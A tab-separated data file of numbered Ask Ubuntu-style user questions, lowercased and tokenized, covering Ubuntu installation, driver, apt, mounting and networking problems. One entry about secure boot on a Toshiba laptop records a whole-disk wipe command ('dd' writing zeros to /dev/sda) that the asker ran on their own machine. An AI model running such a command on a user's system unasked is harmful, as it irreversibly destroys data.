313689	how to install ubuntu on android phone ( htc desire )	i want to install ubuntu on android device . the detail of my handset is as under : - htc desire a8181 ram 512 processor - 1ghz ... where can i find ubuntu os for my android htc desire ?
313690	why ubuntu os is too slow	specifications : samsung mini laptop model code np-n100s-e01 n100s-e01 ram= 4gb hard disc=320 gb processor= intel atom processor atom processor n2100 i am installing ubuntu 13.x os but it is too slow , if i give any command it works after 2 to 3 min . if i can close any windows , it will close step by step slowly slowly . why is it this much slow ? this is the 3rd or 4th time i am installing ubuntu on my laptop and i always had this problem . please help me with your solutions .
313691	missing libjpeg.so.62 from ia32 shared library	i am trying to install a chemical/molecular biology modeling program called molsoft icm-pro . initially after downloading the program and trying to open , it gave me error messages that i was missing shared libraries , and after talking with my network administrator he recommended i install the ia32 shared libraries using sudo apt-get install ia32-libs which gives sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done ia32-libs is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so i am assuming the libraries installed correctly , but now when i try to run the program i get this error : ubuntu : /home/reilly/icmd > icm icm : error while loading shared libraries : libjpeg.so.62 : can not open shared object file : no such file or directory so my question is , where can i get the library containing libjpeg.so.62 ? additionally , i was told i would need libxmu.so.6 and libtiff.so.3 . is there a shared library that could be missing that would contain these files ? i am an ubuntu noob , so sorry if the information i provided was unclear . any help would be immensely appreciated ! btw i am using ubuntu 12.04 dual boot with windows on an hp pavilion dv6
313696	apt-get does not install dependencies	when i try to install the gnutls libraries ( libgnutls26 ) , and the generic linux kernel headers ( linux-headers-generic ) , i get the following error : the following packages have unmet dependencies : libgnutls26 : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.4 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed libgnutls26 : i386 : depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed linux-headers-generic : depends : linux-headers-3.2.0-41-generic but it is not installed how can i fix this error ?
313704	connect playstation console via vpn to the internet	i have a vpn connection to the internet with my pc and want to connect my playstation 3 to the internet . i have ubuntu 12.04 on my pc . how do i do that ?
313706	remote desktop connection similar to windows xp	i recently installed ubuntu on my home pc . how do i connect to my employer 's network via remote desktop like i used to do when i ran xp ?
313708	are there any shortcuts are available in ubuntu like open a window or some built-in applications ?	instead of using mouse every time , are there any shortcuts are available in ubuntu ? if yes , can anyone provide me with a list ?
313710	browser launch is slow on ubuntu 13.04 64-bit	google chrome takes 16 seconds to start initially . i have n't added any extensions .same with the firefox which takes about 10 seconds to start while on windows 7 it is at most 5-6 seconds . i have a dell vostro 1014 with 2.1 ghz core 2 duo,2 gb ram and running ubuntu 13.04 64bit since 15 days . please provide me a good solution for this . thanks in advance ! !
313739	minutely cron job is not running	i added the line */1 * * * * /home/zach/test.sh to my crontab , where the contents of /home/zach/test.sh are as follows : touch /home/zach/test.txt yet , no file test.txt is being created in that folder . is there any reason why cron would n't be performing the desired job ?
313741	rebuild davfs2 with libneon27 instead of libneon27-gnutls	i ca n't connect to my office 's sharepoint webdav with davfs2 . according to http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=668968 , it 's a bug with the libneon27-gnutls instead of libneon27 . how can i rebuild the davfs2 using libneon27 ( as suggested by the first comment on the bug ) ?
313742	apt-get not working after removing libusb	i did not how to put up the title of the question , so sorry . accidentally , i did sudo apt-get remove libusb instead of sudo apt-get remove libusb-dev . and now nothing is working . how can i revert this ?
313743	digitally signing .bin file using a certificate	i have .bin file and i need to digitally sign it to ensure that it is given by me and trusted one . how can i digitally sign ? in microsoft i am using signtool.exe to sign which signs by using a certificate .
313750	noexec option enabled in fstab is not getting applicable for limited user . is it a bug ?	noexec option enabled in fstab is not getting applicable for limited user . is it a bug ? cat /etc/fstab # / was on /dev/sda2 during installation uuid=fd7e2645-3cc4-4c6c-8b1b-016711c2fd07 / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=f3e58f86-8999-4678-a5ec-0a4b621c6e37 /boot ext4 defaults 0 2 # /home was on /dev/sda9 during installation uuid=bcbc1c4d-46a9-4b2a-bb0a-6fe1bdeaed22 /home ext4 defaults , nodev , nosuid 0 2 # /tmp was on /dev/sda5 during installation uuid=8538eecc-bd16-40fe-ad66-7d7b9287839e /tmp ext4 defaults , noexec , nosuid , nodev 0 2 # /var was on /dev/sda6 during installation uuid=292696cf-fc15-40ab-9cd8-cee9bff7e165 /var ext4 defaults , nosuid , nodev 0 2 # /var/log was on /dev/sda7 during installation uuid=fab1f85b-ae09-4ce0-b169-c01205eb8f9c /var/log ext4 defaults , noexec , nosuid , nodev 0 2 # /var/log/audit was on /dev/sda8 during installation uuid=602f5003-4ac0-49e9-99d3-b29378ce9430 /var/log/audit ext4 defaults , noexec , nosuid , nodev 0 2 # swap was on /dev/sda3 during installation uuid=a538d35b-b2e9-47f2-b72d-5dbbcf0afca0 none swap sw 0 0 /dev/sdb1 /mnt/usblpsc auto noauto , user , rw , noexec , nosuid , nodev 0 0 /dev/sdc1 /mnt/usblpsc auto noauto , user , rw , noexec , nosuid , nodev 0 0 /dev/sdd1 /mnt/usblpsc auto noauto , user , rw , noexec , nosuid , nodev 0 0 sudo users are not able to paste executable files in /bin into the file system which have the noexec option set . but limited users are able to paste the same files into the file system which have noexec option set . why is it so ?
313751	is there a way to view progress when syncing with dropbox ?	is there a way to see sync progress when uploading and downloading files with dropbox instead of just the speed and remaining time ?
313754	unable to access “430 gb volume”	error mounting /dev/sda3 at /media/fehr/d42cafd92cafb4c0 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/fehr/d42cafd92cafb4c0 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
313755	playing audio stream not showing in pavucontrol	my pulse audio volume control ( pavucontrol ) is not shown volume bar which present below the volume control slider for right and left channels in the play tab . however , i can hear audio , and the pavucontrol play tab shows the name of the application ( any media player vlc , mplayer etc . ) which is running and volume control for right and left channels ( from left & from right volume slider ) . i am attaching screen shot when i am listening songs . i guess there may be a change in the system configuration/setting ? how to reset it ? i have reinstalled pulseaudio , but the problem remains . i am using ubuntu 12.04 with default pulse audio .
313757	black screen after grub screen	i 've finally got ubuntu 12.04 installed as a dual boot but am having trouble getting it to start . i get to the grub screen and select ubuntu but it just goes to a black screen . the only thing i can do from here is to press ctrl+alt+del to re-boot it , but just keeps happening over and over . it also happens if i pick windows or ubuntu recovery mode . any idea how to fix it ? tia
313758	is there any way to combine to internet connections	i have two network interfaces which are a wireless and a mobile broadband . they have different networks or service provider . i plan to combine them for faster upload and download speeds . is there any good way of doing this ?
313761	apt-get complains about untrusted packages	since installing kubuntu 13.04 , apt-get ( and all other packaging tools ) complain about untrusted packages . as an example , when i try to install ruby1.9.1-dev : # aptitude install ruby1.9.1-dev the following new packages will be installed : gcc { a } gcc-4.7 { a } libc-dev-bin { a } libc6-dev { a } libgcc-4.7-dev { a } libitm1 { a } libquadmath0 { a } linux-libc-dev { a } manpages-dev { a } ruby1.9.1-dev 0 packages upgraded , 10 newly installed , 0 to remove and 3 not upgraded . need to get 15,8 mb of archives . after unpacking 41,0 mb will be used . do you want to continue ? [ y/n/ ? ] warning : untrusted versions of the following packages will be installed ! untrusted packages could compromise your system 's security . you should only proceed with the installation if you are certain that this is what you want to do . ruby1.9.1-dev gcc-4.7 libgcc-4.7-dev libquadmath0 gcc libc6-dev libitm1 linux-libc-dev manpages-dev libc-dev-bin do you want to ignore this warning and proceed anyway ? to continue , enter `` yes '' ; to abort , enter `` no '' : i 'm pretty sure gcc is an official package : - ) what 's causing this and how can i get rid of it ?
313763	pipe an infinite stream to internal loop ?	i 've seen a lot of things about redirecting stdout to a tcp socket , but no real example of how to do it in practice , specifically when the output stream generated by the first `` command '' never ends . to talk about something concrete , let 's take programs like servers that typically output their log endlessly to stdout ( well , as long as they run ) . if you redirect the output to a log file on the disk , then this file is always open ( therefore not readable by others ? ) and grows infinitely , which eventually is going to cause problems . this might be a nood question , but i do n't know what it does or how to do it so . how to redirect the output of a command to the internal loop ? i want to make sure that data is sent every time something is written to stdout , and that the pipe wo n't wait for the command to end ( never happens ideally ! ) . is that right ? if 2 is true , is there a buffer system to send chunks of data once it reaches a certain size only ? could you give me concrete command line examples to do the above ? thanks in advance
313768	how do i go back to 12.04 ?	stupidly , i upgraded my ancient laptop to 13.04 and am now in a world of slowness . i 'm running in dual-boot mode alongside win xp . i 've seen other similar requests and the answer is reinstall . my question is how ? i 've put my 12.04 cd in and it boots ok and asks me if i want to install but then just hangs .
313771	usb ( wireless ) keyboard not recognised during install	i 'm just trying my first trip into the world of ubuntu . trying to install from cd on to a virgin machine , i get the initial language prompt , select 'english ' , i get the ubuntu install options , select 'install ubuntu server ' . i 'm then presented with a further 'language for installation ' screen . at this point my keyboard stops working ... ! some specifics : i 'm using a logitech wireless usb keyboard - it works fine on another machine ; machine is a proliant micorserver n54l ( no ps/2 ports ) ; bios usb support is set to legacy . any ideas ... ? thanks , jonathan
313772	how can i browse by artist in banshee ?	i have ripped many cds onto my computer . some are compilations . i like to listen to entire albums at a time . the artist view is no use to me as it splits up artists from the compilations , and the album-artist view is a bit better but it still has problems because it splits an album up by each different artist listed in it . is there a way to force banshee to list the albums ? that would be most useful .
313778	what happens with my flash player video	like what i said before my flash player looks like crashed.. there is some screenshot http : //en.zimagez.com/full/636a6be2bf925a96329a618ec91320d49c925a512148ccde6924c0fb25bf0a9de64d673426bed6962b0e01f933229b96373c19c3d88eba72.php anyone pls tell me how to fix it.. i 'm using lubuntu 13.04.. using very old pc
313790	maas . adding nodes	can anybody help me with maas installation ? i installed it on 1 of my computers , configured dhcp server and now 3 pcs are in their own private network . i tried to add node via pxe image , but `` can not apply stage final , no datasource found ! likely bad things to come ! '' error comes after giving me option to log in . then i tried to add node via web interface , but after adding it node 's status is always `` commisioning '' . so what should i do know ? any help is appreciated . thank you p.s . english is not my native language , sorry for any type of errors .
313792	freeing space in ubuntu ?	during my installation i have used my whole hard-disk ( about 480 gb ) for installing ubuntu removing my built in windows 8 . but recently i want to install windows again as i have come to know that my laptop has a touch-screen and i just want to feel that . is there any way to free up some memory and install windows alongside ubuntu ? this is my laptop spec .
313795	script to compress multiple files	i have a script that generates backup and finds files older than 30 days and compresses them . now the problem i 'm facing is if the files are more than one than how can i edit the script so that it compresses all those files as well . below is the find function im using . please help . time=+30 path_to_dump=/home/tarun/desktop/backup # find any backup file defined by the time constraint file= '' $ ( find $ path_to_dump -type f -mtime $ time ) '' # to verify if $ file is empty or has some value if [ ! -n `` $ file '' ] ; then echo `` no earlier backups were found to compress '' > > $ path_to_log else echo `` earlier backups $ file will be compressed '' > > $ path_to_log gzip $ file fi
313797	a problem with krita	legacy integer arithmetics implementation krita ( 5850 ) /kdeui ( kiconloader ) : error : standard icon theme `` oxygen '' not found ! got bus address : `` unix : abstract=/tmp/dbus-vnizsic28n , guid=ba4cb51309f8eaeddc2d0a2f00000017 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-vnizsic28n , guid=ba4cb51309f8eaeddc2d0a2f00000017 '' registered dec : true krita ( 5850 ) /koffice ( lib komain ) : `` krita '' part.desktop not found . krita ( 5850 ) /koffice ( lib komain ) : run 'kde4-config -- path services ' to see which directories were searched , assuming kde startup had the same environment as your current shell . krita ( 5850 ) /koffice ( lib komain ) : check your installation ( did you install calligra in a different prefix than kde , without adding the prefix to /etc/kderc ? ) i recently tried installing krita . i used the command line they provided on the website and this is what i got . the command line was : sudo add-apt-repository ppa : kubuntu-ppa/backports sudo apt-get update sudo apt-get install krita
313800	graphics problem on new lubuntu install	i 've just install lubuntu 13.04 32-bit on an old machine . when i boot , i essentially get no gui . i have a cursor , and very poor 8-bit colour background , but no windows or buttons etc . i believe this is just a login screen , but i just ca n't tell . switching to tty1 ( i think that 's what it 's called ) via ctrl + alt + f1 , i can login , and run programs as i would expect . everything seems to be working except the gui . it does n't appear to be running lxde , only lightdm , but i think that 's to be expected due to the fact i have n't logged in yet . unfortunately , i 'm struggling get wifi to connect from the command line , so i ca n't run updates yet , although it was connected during install , so i think some were done then . any help in diagnosing and solving the problem would be appreciated . which logs should i check ? what other information would be useful ? output of lspci -v : ... vga compatible controller : s3 graphics ltd. 86c375 [ virge/dx ] or 86c385 [ virge/gx ] ( rev 01 ) ( prog-if 00 [ vga controller ] ) subsystem : s3 graphics ltd. virge/dx flags : bus master , medium devsel , latency 32 , irq 11 memory at dc000000 ( 32-bit , non-prefetchable ) [ size=64m ] [ virtual ] expansion rom at 18020000 [ disabled ] [ size=64k ] kernel driver in use : s3fb vga compatible controller : s3 graphics ltd. savage 4 ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : diamond multimedia systems stealth iii s540 flags : 66mhz , medium devsel , irq 10 memory at e2000000 ( 32-bit , non-prefetchable ) [ size=512k ] memory at d0000000 ( 32-bit , prefetchable ) [ size=128m ] [ virtual ] expansion rom at e1000000 [ disabled ] [ size=64k ] capabilities : < access denied >
313802	installing ubuntu on formated hard drive	i am currently using windows xp and i wanted to install ubuntu alongside windows using live cd . but every time i started the installation , ubiquity would freeze on 'install alongside ' screen . i have 2 partitions c ( in which windows is installed ) and d on my hard drive . when i formatted the d partition and tried to install ubuntu , ubiquity did not detect any of the partitions . i just want to know that if i format both the partitions and then try to install ubuntu , will ubuntu get installed without any problem as encountered by ubiquity stated above or how can i fix this problem ?
313803	no unity shell , no unity panel and no dual monitors	i did something terrible this morning you can see here . now that problem was fixed , apt was working fine and so was the update manager . after installing all updates , i rebooted . and i could not log in . the login page will like refresh after i enter my password , every time . then i installed kdm in place of lightdm , and now i have no unity shell , no panel , and the display settings gives an error *gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr* any help will be appreciated .
313804	configure firefox searchengine to use duckduckgo in german	i want to change the default langauge , duckduckgo uses when i start a search . what i already tried to do is simply add duckduckgo to my search bar . i also installed their addon . both works if i configure on the duckduckgo homepage to use german by default . but since i erase all my firefox cookies by default on logout , i have to restore that setting each time . the default config for ddg is to use the standard language of the browser i think . so maybe that is configured wrong ? using google i can change the language easy by using : https : //www.google.com/ ? hl=de https : //www.google.com/ ? hl=fr ... .
313806	how to list available backport upgrades	i have just followed ubuntu backports to activate manual backports and i have a couple of questions . how can i , in the command line ( e.g . apt-cacher or aptitude ) : list installed packages that have available backport upgrades ? ( before , i used apt-show-versions -u for upgradeable packages ) list all available backport packages ( installed or not ) ?
313813	how to start and run a command in x server from remote terminal ?	i need to run a command in ubuntu terminal on my computer . i am connected to the other computer by ssh . i need to be able to start x server from my remote computer ( without being able to interact with x server once it has started ) and run a script in x server once it starts . any suggestions ? thanks in advance ! : )
313818	move window to workspace without changing workspace	ctrl+alt+shift+arrowkey moves the active window to an other workspace and then `` moves '' the user to that workspace . is it possible to just move a window to the next workspace while staying at the current workspace ? in my desktop i can just left click on a window and then click `` move to workspace right '' . but i would prefer a shortcut method . p.s . i use gnome-classic
313826	ubuntu 13.04 no bluetooth adapter found	after running smoothly since last distro upgrade i suddenly lost my ability to connect to my bluetooth hub ( logitech ) . after i remotly tried to shutdown the computer which failed i got back home after a couple of days and when rebooting the desktop i could no longer connect to my bluetooth hub . i have no bluetooth icon in the top bar . when starting the bluetooth settings it says no adpater present and i ca n't swich it on or off . info : information supplied gotten from this question ( http : //ubuntuforums.org/showthread.php ? t=2143716 ) bluetooth works under win7 which i dual boot . i have n't checked if it 's turned off in bios due to this . $ rfkill list returns nothing . $ rfkill list all returns nothing . $ lsusb bus 002 device 002 : id 0451:2036 texas instruments , inc. tusb2036 hub bus 002 device 003 : id 1241:1603 belkin keyboard bus 002 device 004 : id 192f:0716 avago technologies , pte . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 005 : id 046d : c705 logitech , inc. mx900 bluetooth wireless hub ( c-uj16a ) $ lspci 00:00.0 host bridge : nvidia corporation c55 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:00.2 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:00.3 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:00.4 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:00.5 ram memory : nvidia corporation c55 memory controller ( rev a2 ) 00:00.6 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:00.7 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.0 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.1 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.2 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.3 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.4 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.5 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:01.6 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:02.0 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:02.1 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:02.2 ram memory : nvidia corporation c55 memory controller ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c55 pci express bridge ( rev a1 ) 00:06.0 pci bridge : nvidia corporation c55 pci express bridge ( rev a1 ) 00:07.0 pci bridge : nvidia corporation c55 pci express bridge ( rev a1 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.2 ram memory : nvidia corporation mcp51 memory controller 0 ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev a1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev a1 ) 00:0f.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev a1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 01:00.0 pci bridge : nvidia corporation device 05bf ( rev a2 ) 02:00.0 pci bridge : nvidia corporation device 05bf ( rev a2 ) 02:01.0 pci bridge : nvidia corporation device 05bf ( rev a2 ) 02:02.0 pci bridge : nvidia corporation device 05bf ( rev a2 ) 02:03.0 pci bridge : nvidia corporation device 05bf ( rev a2 ) 03:00.0 vga compatible controller : nvidia corporation g92 [ geforce 9800 gtx / 9800 gtx+ ] ( rev a2 ) 09:08.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) ( information supplied from this question ubuntu 13.04 - no bluetooth adapters found ) $ dmesg | grep bluetooth [ 15.949006 ] bluetooth : core ver 2.16 [ 15.949034 ] bluetooth : hci device and connection manager initialized [ 15.949088 ] bluetooth : hci socket layer initialized [ 15.949090 ] bluetooth : l2cap socket layer initialized [ 15.949096 ] bluetooth : sco socket layer initialized [ 15.952688 ] bluetooth : rfcomm tty layer initialized [ 15.952703 ] bluetooth : rfcomm socket layer initialized [ 15.952705 ] bluetooth : rfcomm ver 1.11 [ 15.974302 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 15.974306 ] bluetooth : bnep filters : protocol multicast [ 15.974315 ] bluetooth : bnep socket layer initialized https : //help.ubuntu.com/community/bluetoothsetup has no current up to date info what i have tried : rebooting *100 $ sudo service bluetooth restart $ sudo /etc/init.d/networking restart and $ sudo /etc/init.d/bluetooth restart $ sudo apt-get install bluetooth blueman bluez-hcidump bluewho python-bluez bluez-tools running live usb of 13.04 . running live usb of 12.04 . when i try to run 12.04 lts , i can at the start connect my keyboard , however after a few seconds a message about wifi flashes quickly in the notification area and the system craches . if it recovers i am back to the previous state with no bluetooth connection ability . this indicates to me that something can be done about this issue . any help would be good
313828	why is pkexec preferred over gksudo for graphical applications ?	please provide ubuntu documentation that refutes this : https : //help.ubuntu.com/community/rootsudo why , on my fully updated 13.04 system , does pkexec not function ? $ pkexec gedit somefile.txt no protocol specified ** ( gedit:13135 ) : warning ** : could not open x display can not open display : run '/usr/bin/gedit -- help ' to see a full list of available command line options
313829	ubuntu 12.04 and 13.04 installs fail if secure boot ( uefi ) is enabled on toshiba tecra r950	just bought a toshiba tecra r950 laptop , which comes with secure boot enabled by default , and win8 preinstalled . i wrote an ubuntu 12.04 amd64 iso on an usb using linux live usb creator - lili ( i use this on all ubuntu installs ) , installed the os alongside windows8-64 and the system continued to boot in windows 8 without any boot prompt . i wiped win8 ( actually dd if=/dev/zero of=/dev/sda ) and reinstalled , and the bootloader went for pxe boot ( did n't recognize the grubx64.efi file in the efi partition ) . i tried the same with ubuntu 12.10 and 13.04 with no success . i tried reinstalling grub-uefi-amd64-signed , running grub-install -- uefi-secure-boot , copying grubx64.efi to /efi/ubuntu/ and adding the bootloader entry using efibootmgr , with no success . the bootloader just loads windows ( or pxe if no windows is installed ) . i tried changing the bootorder via efibootmgr to make the ubuntu entry the only option , with no success . also tried setting the entry name to `` windows boot manager '' , did n't have any effect . a trip to the bios setup did n't help much . i can disable secureboot but i want to keep windows8 setup in uefi mode , and apparently i ca n't have ubuntu installed alongside it . also i do n't see any section in the bios for adding additional uefi bootloader keys . has anyone had any success booting linux with secure boot enabled on this device ? or on a similar toshiba ( tecra ) model ?
313831	how to create a remote desktop connection between two ubuntu pcs	i have installed ubuntu 12.04 as a server on a pc , but i am unable to connect via remote desktop from my another ubuntu pc . can you help me ? thanks .
313832	unable to print with brother mfc-290c	i have an ubuntu 12.04 laptop from which i want to print in a brother mfc-290c printer wired to a win7 pc . printer is already being shared by pc . i 've tried to install the printer via alt+f2 system-config-printer , added it as a network windows printer via samba , verifyed access ... but when asked for the manufacturer and model of the printer i found it was not available on the database . then i tried getting a .ppd file for my printer on the brother site , found there were only .rpm and .deb options which i do n't know how to handle . also i 've tried generic drivers like pcl6 . although installation was `` successfully '' completed , nothing happend when i ordered a test page . any guesses ? is my printer just too old ?
313835	can not connect to internet , probably an ip conflict	my computer connected to internet fine earlier today . then i plugged another computer into another port of my router . this new computer is connected to the internet and is working fine . my ipad through wifi which also is connected to the same router is working fine . but my original computer ca n't connect to the internet . some sort of ip conflict ? i know very little about computers and networking so i would really appreciate you 're help . thanks in advance .
313836	nexus 7 3g wo n't flash ubuntu touch	i am unsuccessfully trying to flash any ubuntu touch daily onto my n7 tilapia . i followed the instructions from ubuntu wiki for tilapia step by step . the fastboot method ended up with terminal saying `` waiting for device '' while the n7 booted into fastboot mode by itself . i waited for several hours , nothing happened . manual install method in recovery aborted because the zip is for grouper and wo n't install on tilapia . can someone please help me ? as a long-term ubuntu user on pc and laptop i am eagerly waiting for ubuntu touch on a tablet . thanks in advance !
313837	make ubuntu host ignore nic , and let vm guest fully control it	is it possible to make a ubuntu desktop host ( running on a physical machine ) ignore a network interface card ( nic , ethernet ) , and let a virtual box guest take full control of that nic regarding ips , etc ? the ubuntu host has access to the network through another nic . if this is possible , could it be done in a simple way ( using the graphical network manager ) . any suggestions ? thank you in advance .
313840	unity desktop folder conundrum	ubuntu beginner here . i have 13.04 , and whenever i try to create new folders on the desktop i am plagued by two issues : the folder icons start out extremely tiny , so i have to resize them . i ca n't see the names of the folders anywhere around them . any way to remedy these ?
313846	installing ubuntu on hdd without a dvd	i want to install ubuntu on my second pc . there is windows 7 on it , but i can delete it . but my problem is , i want to install ubuntu on this pc . how can i do that ? i have no dvd where i can put in the .iso so can i install it with daemontools ? open the .iso with daemontools and install it ? or how i can install it from a usb-stick . i tried it , but my pc ( bios ) dont boot with the .iso in it . i hope you guys can help me and sorry for my bad english .
313851	openstack : how to make cloudify use the floating ip instead of the fixed one ?	i have a problem with cloudify ( both 2.5 and 2.6-rc release ) . i have an all-in-one openstack 2013.1.1 setup and i 'm trying to use cloudify to bootstrap a cirros 0.3.1 vm . my quantum configuration is : pool of fixed ip ( 10.0.0.0/24 ) for vm management ; pool of floating ip ( 192.168.1.170-190 ) taken from 192.168.1.1/24 ( my lan ) when i deploy a vm first , an ip from 10.0.0.0/24 is given ( i can not reach it from my pcs because it is only for vm management ) and then i associate a floating ip with which i can ping ( and ssh ) the deployed machine . the problem is when i do : bootstrap-cloud openstack because cloudify stay forever into `` attempting to access management vm 10.0.0.3 '' and this is due to the fact that 10.0.0.3 is not reachable . what can i do to get cloudify take the floating ip instead of the fixed one ?
313854	`` offline '' ( cdrom ) package repository	i am running a ubuntu 12.04 lts server on a private network that does n't and never will have internet access . i have a need to install packages from time to time for development purposes , and rather than download the .deb files everytime to manual install i would like to create an offline repository in the form of an .iso that i can present to my vm 's in esxi . what is the best way to go about doing this ? i assume once i have them on a cd i can add the mounted iso to apt sources.list ?
313858	why wo n't my graphics work in ubuntu 12.04 lts ?	i 'm very new to ubuntu and to linux in general , and took the leap and formatted my pc to ubuntu 12.04 lts very recently : ) i seem to be having some trouble getting my graphics card to run properly , i looked over what information i could find but i still can not get it up and running and figured this was a good place to ask for help . the information i can find on my graphics is as follows : lspci outputs : 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] i tried using a mixture of the following links : how do i fix my installation of ati catalyst video driver in 12.04 lts ? what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ? ubuntu precise installation guide but it does not seem to work , since running fglrxinfo in terminal gives : display : :0.0 screen : 0 opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) opengl version string : 1.4 ( 2.1 mesa 9.0.3 ) what am i doing wrong here ? all help appreciated . edit : i have tried the legacy driver from http : //www2.ati.com/drivers/linux/amd-driver-installer-catalyst-13-4-linux-x86.x86_64.zip i also tried the guide at https : //launchpad.net/~makson96/+archive/fglrx which caused the system to crash ( blackscreen , no boot ) neither seemed to work . i did however reinstall ubuntu 12.04 lts , and re-tried both with no success . reinstalling ubuntu did however fix the broken dependencies problems , etc .
313860	installing netbeans 7.3.1	i get following error /usr/local/java/jdk1.7.0_25/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory installation stops there . i checked and in the directory mentioned there is no file like libxtst.so.6 . the java ( oracle ) installation is from latest download . java version and javac version gives the required outputs .
313864	unable to download full file using wget	i 'm trying to download a file using wget . it shows the download is successful but does n't gives me the right file . errors out when i try to untar the file . also the downloaded file size is not correct nor consistent . can you please let me know if i 'm not using the wget properly ? this is what i tried : root @ sys : ~ # wget http : //mirrors.sonic.net/apache/mahout/0.7/mahout-distribution-0.7.tar.gz -- 2013-06-28 18:43:23 -- http : //mirrors.sonic.net/apache/mahout/0.7/mahout-distribution-0.7.tar.gz resolving mirrors.sonic.net ... 69.12.162.27 connecting to mirrors.sonic.net|69.12.162.27|:80 ... connected . http request sent , awaiting response ... 200 ok length : 255 [ text/html ] saving to : `mahout-distribution-0.7.tar.gz' 100 % [ ====================================== > ] 255 -- .-k/s in 0s 2013-06-28 18:43:24 ( 20.5 mb/s ) - `mahout-distribution-0.7.tar.gz ' saved [ 255/255 ] the actual file size is 70mb but it downloads only 20mb and says complete . if i try the same command again , it downloads a file with different size ( say 32mb ) .
313866	how to install gcc and g++ compilers	i have tried these commands in terminal , sudu apt-get upgrade sudu apt-get update sudu apt-get install build essential but failed . please help me , i am getting the following error . no command 'sudu ' found , did you mean : command 'sudo ' from package 'sudo ' ( main ) command 'sudo ' from package 'sudo-ldap ' ( universe ) command 'tudu ' from package 'tudu ' ( universe ) sudu : command not found
313872	ubuntu 13.04 is unable to mount a disk drive from ex-windows system	i just installed ubuntu 13.04 as a single os on a system previously installed with windows 8 . almost everything is working fine except 1- i can not control my brightness ( hotkeys are able to move slider ) system : vaio vgn-cs26g 2- i can not open any other disk partition execpt the one with ubuntu . there are two of them . i remember changing 1st partition 's type to 'swap ' during installation ( this one is now invisible ) . and i am completely sure i have not anything with the other partition , if i try to open it , it gives error : unable to access drivename , error mounting /dev/sda3 at /media/kashan/zombie check : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' '' /media/kashan/zombie check '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdownwindows fully ( no hibernation or fast restarting ) , or mount the volumeread-only with the 'ro ' mount option . thanx in advance . p.s . i am a beginner so please donot use complicated terms
